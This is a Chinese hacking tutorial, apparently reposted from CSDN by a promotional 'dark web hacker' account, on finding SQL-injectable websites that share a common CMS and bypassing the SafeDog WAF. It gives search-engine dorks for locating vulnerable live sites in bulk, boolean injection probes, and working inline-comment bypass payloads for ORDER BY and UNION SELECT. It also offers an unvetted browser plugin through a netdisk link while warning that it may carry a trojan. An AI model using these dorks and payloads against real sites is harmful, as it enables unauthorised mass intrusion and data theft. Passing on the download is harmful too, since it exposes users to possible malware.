通杀挖掘之bypass安全狗
作者:互联网
更多黑客技能 公众号:暗网黑客
本篇分享大纲:
主流浏览器安装谷歌助手插件。
分享谷歌找通杀技巧。
Bypass最简单的技巧。
一、首先介绍一下今天的漏洞:
今天要说的通杀漏洞主要是SQL注入,其次是遇到WAF以后,如何Bypass。
SQL注入的原理必须要熟记于心:
用户能够控制输入数据 。
能够将用户输入的数据拼接进去执行。
二、安装插件:
首先安装谷歌插件,该插件我会以附件的形式放在文章最下方(害怕有木马的,弟弟也没得办法)。
Firefox火狐浏览器可能暂时不支持,也或许弟弟不知道,如果有可以用的大佬麻烦告诉弟弟。
360极速浏览器:
第一步:
第二步:
由于这个步骤没办法截图,我也懒得做GIF动图了。
大家能理解就自己操作,不行的话就加我QQ(914659453)
Google Chrome谷歌浏览器:
第一步:
第二步:
由于这个步骤没办法截图,我也懒得做GIF动图了。大家能理解就自己操作,不行的话就加我QQ。
三:谷歌语法:
科普一下谷歌语法,虽然网上一大堆谷歌语法的教程。但是我立志写一篇最详细的。
这里是本次用到的:
site:指定域名,例:site:edu.cn 列出所有域名带有edu.cn的网站
inurl:指定url/目录/脚本语言,例:inurl:login.php 列出所有url中带有login.php的网站
intitle:指定网站标题,title部分,例:intitle:后台管理 列出标题为后台管理的网站
link:搜索链接到所输入URL的页面,该操作符不需要关键字,不能与其他操作符及关键字混用
intext:把网页中的正文内容中的某个字符做为搜索条件(但是只能搜索冒号后接的一个关键字)
双引号":强制搜索被双引号引用的内容
谷歌语法参考链接:
https://blog.csdn.net/u013589137/article/details/82758762
http://blog.sina.com.cn/s/blog_b4cbba7e0102x567.html
更多语法就不在这里讲解了,大家有兴趣可以继续去寻找。
四:准备就绪,战斗开启:
事先声明,本篇文章所涉及到的漏洞均已提交SRC平台。
希望小伙伴们可以发挥自己的思路,本文章只是给你们提供思路,具体情况自己发挥。
之前我用谷歌语法找注入,找到了很多。
然后偶尔一次发现存在注入漏洞的网站下方都会有一个技术支持,然后通过技术支持找到了很多一样的网站,判断为CMS,这就成就了所谓的通杀。
谷歌语法:`site:cn inurl:php?id=1 intitle:公司`
通过这种方法会找到很多存在注入漏洞的网站(这里我觉得没必要进行打码,因为毕竟很多人都可以找到)
当然语法不是固定的,inurl可以指定别的注入关键字,这些还是需要大家自己去收集了。
这里找到一个:http://www.xxxxxxxx.cn/m/brand_list.php?id=3 测试存在注入,看着像CMS。
别问我为什么,因为我之前遇到过这种的。
返回首页看一下技术支持。
点开网站建设,发现是xx网络。
这里有两个思路:
1. 进入xx网络的官网,查看网站案例(如果没有,看下一个)
2. 搜索引擎搜索关键字
第一个思路:
进入xx网络的官网,查看网站案例。
这里虽然有案例作品,但是并没有写案例官网,所以略过。
第二个思路:
FOFA语法:
"xx网络" && country="CN"
大概出现这三种,确认是一个cms,但是FOFA只搜索到了一点站,案例不够怎么办?
搜索引擎这么多,干嘛非得他一家。
谷歌语法:
inurl:php "济南xx网络"
这些案例肯定够了。
说实话,这个案例是我在写这边文章的时候找到了。。。
还有一点就是最简单找通杀的谷歌语法:
inurl:注入关键字 "技术支持:"
五:Bypass的案例:
这些案例是我之前找的注入点,过了几个月发现有技术支持,然后url基本一样,就发现的通杀。
这里先说一下payload:
/*!60000asd*/ WAF过滤哪些关键词就写在哪些中间,例如:order/*!60000sad*/by 1 或 系统函数:user/**/() 或 database/**/(),等
这里再解释一下Payload:
/*!*/ 属于内联注释
asd 属于填充代码,必须有,可以随便输
60000 属于数据库版本号,为5位数,可换成其他5位数号码(只要能过狗)
安全狗:
谷歌语法:
inurl:about.php?id=1 "xx建站"
找到很多同一CMS的站点,开始注入。
进去以后正常页面。
添加单引号:
and 1=1 拦截
and -1=-1 不拦截
and 1=2 拦截
and -1=-2 不拦截
报错存在注入,既然确定存在注入,就直接order by。
存在WAF,安全狗,利用上面我提到的语句来绕过。
order/*!60000asd*/by 字段数 limit 1,1
成功绕过。
下面联合查询,union select。
正常写联合查询被拦截。
还是用上面提到的Payload来绕过。
union/*!60000asd*/select 1,2,3,4 limit 1,1
成功绕过,系统函数也是同样的道理绕过。
由于时间关系,没时间写那么多,请大家给小弟一些时间。咱们下次再会!
谷歌访问助手已经放在网盘了,自取
链接:https://pan.baidu.com/s/1ZVs5SXyPRwR4g-vcEnXjVQ
提取码:zkaq
黑客渗透视频教程,扫码免费领
标签:谷歌,通杀,inurl,语法,xx,bypass,挖掘,注入 来源: https://blog.csdn.net/hackzkaq/article/details/113179419